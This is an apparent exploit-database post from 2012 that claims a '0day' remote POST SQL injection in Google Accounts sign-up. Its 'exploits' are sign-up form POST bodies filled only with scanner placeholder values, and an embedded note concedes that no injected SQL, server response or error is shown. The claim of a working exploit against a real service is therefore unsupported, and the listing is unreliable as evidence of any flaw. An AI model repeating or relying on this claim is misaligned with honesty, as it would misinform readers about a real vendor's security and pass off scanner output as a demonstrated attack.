-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
>> Exploit database separated by exploit type (local, remote, DoS, etc.)

[x] Official Website: http://www.1337day.com
[x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com

==========================================
I'm Taurus Omar Member From Inj3ct0r TEAM
==========================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

| C _:_ A | Google Accounts - Remote Post SQL Injection | C _:_ A |
--------------------------------------------------------------------------

==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com

===> INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day
Title Exploit : Google Accounts - Remote Post SQL Injection
Vendor        : Google Accounts
URL Vendor    : https://accounts.google.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase

==> SAMPLE REMOTE POST SQL INJECTION
https://accounts.google.com/SignUp?dsh=-3394680781346882451 [ Remote Post SQL Injection ]
https://accounts.google.com/SignUp?dsh=-770862407476176606 [ Remote Post SQL Injection ]
https://accounts.google.com/SignUp?dsh=-5017265924696190063 [ Remote Post SQL Injection ]

==> EXPLOITS
Note: each entry below is a sign-up form POST body whose user-editable fields hold only placeholder values (WCRTESTINPUT000000 to WCRTESTINPUT000008). No injected SQL, server response or database error is shown, so the listing by itself does not demonstrate that any parameter is injectable.
+service^FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&signuptoken_audio=03AHJ_Vutn2Vtf6cCvpXUFF6vSBmirO_hh8szeKcy1tVu-7BzjzIoW97GW3YJ_ID_6pBrFSCLW3RN87sV0L9r8tBaYo28KwQYeDiTYq423bG4ruBWQoesuFxYnIDWCgpgJLZHxq8Rpv2cO_o3RGw-K6wpqvzBSKgxUMOV6v9CUtVs5YybVL0Exo3HRHfPmCj1ZltSg747kQOdunPf45ondqCppfGgLJPxiMl0BMSt6Sn3QZGgeVtMp7N4&signupcaptchaStats=tI6dAp5ZN72-M5FAITF-5HT_Lo24fSX-3Kg1yBkdTy0:DKNJ4Hd39irFXaNhiJ6Hzw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964525237&secTok=.AG5fkS9GBXZIxFHkrNQr-ou2fUsVmHpnUw==&dsh=-3394680781346882451&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled 
+service^BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=1 
+service^Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next step&BirthMonth=01 
+service^recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&service=&timeStmp=1339964709751&secTok=.AG5fkS9lhHkOYclS4_VC6q_tROYinHqGAg==&dsh=-770862407476176606&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA&signuptoken_audio=03AHJ_VuszKJ0XiQRiVFzfWHDCfI2vaYv7nW9WufYZ6VzVxWvCs6aPx6a3h2xaIIWl-BC8zKBbKLdEK64pOgijAHZlhkaukhM71nwWyStbox5W9YvniB3tosFATLxxY-oe0aiXKWTmSOlx_-Ols2J1VssMo5SDVxOvHZ5V1c8qt_eLVFOttue12mqrLr4Y_FY3TKJkL2uxwPpZKKA5CMb_-9-dhARQBmq00g&signupcaptchaStats=nff7Jgmbb5-B-4CCMAxFrHT_Lo24fSX-3Kg1yBkdTy0:r3Jh83qi797Sgs363bSzuw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vuv8iGo71NEw0sC3NhSiuW7-KiCr29IPZCRFM3NA8vO_65AfCu4fXoGFDfMjgvA3J6Jl223iB8JegRnRKh6FZ_VpiXkMUjqMkF28PxO2TU5vXc6dnGsFbs8L_b30onAU63HLH5V2QsI1VhuLITksfkRKk_29kA 
+service^service=&timeStmp=1339964525237&secTok=.AG5fkS9GBXZIxFHkrNQr-ou2fUsVmHpnUw==&dsh=-3394680781346882451&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&signuptoken_audio=03AHJ_Vutn2Vtf6cCvpXUFF6vSBmirO_hh8szeKcy1tVu-7BzjzIoW97GW3YJ_ID_6pBrFSCLW3RN87sV0L9r8tBaYo28KwQYeDiTYq423bG4ruBWQoesuFxYnIDWCgpgJLZHxq8Rpv2cO_o3RGw-K6wpqvzBSKgxUMOV6v9CUtVs5YybVL0Exo3HRHfPmCj1ZltSg747kQOdunPf45ondqCppfGgLJPxiMl0BMSt6Sn3QZGgeVtMp7N4&signupcaptchaStats=tI6dAp5ZN72-M5FAITF-5HT_Lo24fSX-3Kg1yBkdTy0:DKNJ4Hd39irFXaNhiJ6Hzw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_Vus-NeJEitTFwQZN9-W7tvvLR60Ext5ILMlzZ7CUM_kynLV39obH2HfVSL1vwjXCtjLdscVlBHg8tgtGsrclLApUDygqT035-BFMNhAQ82HCUXP56Sr8-eXt0Huv2UBragGRcDJ-jetYtG0CV8j-Oh1QGEsa3my2EGf7Ubs67qXLIDmBBmc&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF 
+service^secTok=.AG5fkS9jC2B0P7HTFpzGdwnc6CF9ZIyI2w==&dsh=-5017265924696190063&ktl=&ktf=&_utf8=☃&bgresponse=js_disabled&FirstName=WCRTESTINPUT000000&LastName=WCRTESTINPUT000001&GmailAddress=WCRTESTINPUT000002&Passwd=WCRTESTINPUT000003&PasswdAgain=WCRTESTINPUT000004&BirthDay=WCRTESTINPUT000005&BirthYear=WCRTESTINPUT000006&RecoveryPhoneCountry=EC&RecoveryEmailAddress=WCRTESTINPUT000007&signuptoken=03AHJ_VuvcMBtty9sszn1ZlYM65XZ_D5SVpCaInTeil9iTwox2fkIF-F-69dUkd0wxCVBSAeM-iYEkJsdX8gpQPJEC1dMSr-lOPOsJnrLcDiDGGM1MM5imRLcyLsGDHvNRbyPA-GmT8Rf7m4Lt7g30jz_1X2I9NNxqxg&signuptoken_audio=03AHJ_VuuAW2-omUNFAeRVjGubMnzfNT8d1sxOBoMrznM6XiZOjKzpwLiStM06K6t5JJyDoAhW0fK-ake2BHZLbAA-zzhO7XqR9V6QrED2-RPTRlVi50yXz1uMxISD1eI0hx9ranxhDSlnf0ML0Vhnei4bVWUEhGVLwVtGqJrCnRrhnTLZgxsWkrgEyLl1V8-01fRP2XHAnVknzf8aSz4StTvi35rB-hupi2UcOrfKaFTWbGDJFdbbH2A&signupcaptchaStats=vnxd_QEB93Y5tPg4SEBt9HT_Lo24fSX-3Kg1yBkdTy0:sb-sZtSa8xC_H1KqfmjUkw&recaptchaKeyVersion=0&recaptcha_challenge_field=03AHJ_VuvcMBtty9sszn1ZlYM65XZ_D5SVpCaInTeil9iTwox2fkIF-F-69dUkd0wxCVBSAeM-iYEkJsdX8gpQPJEC1dMSr-lOPOsJnrLcDiDGGM1MM5imRLcyLsGDHvNRbyPA-GmT8Rf7m4Lt7g30jz_1X2I9NNxqxg&recaptcha_response_field=WCRTESTINPUT000008&submitbutton=Next%20step&BirthMonth=01&Gender=FEMALE&CountryCode=AF&continue=https://accounts.google.com/ManageAccount&timeStmp=1339964528546 # 1337day.com [2012-06-18]
Google Accounts - Remote Post SQL Injection Vulnerability
Senin, 18 Juni 2012 | komentar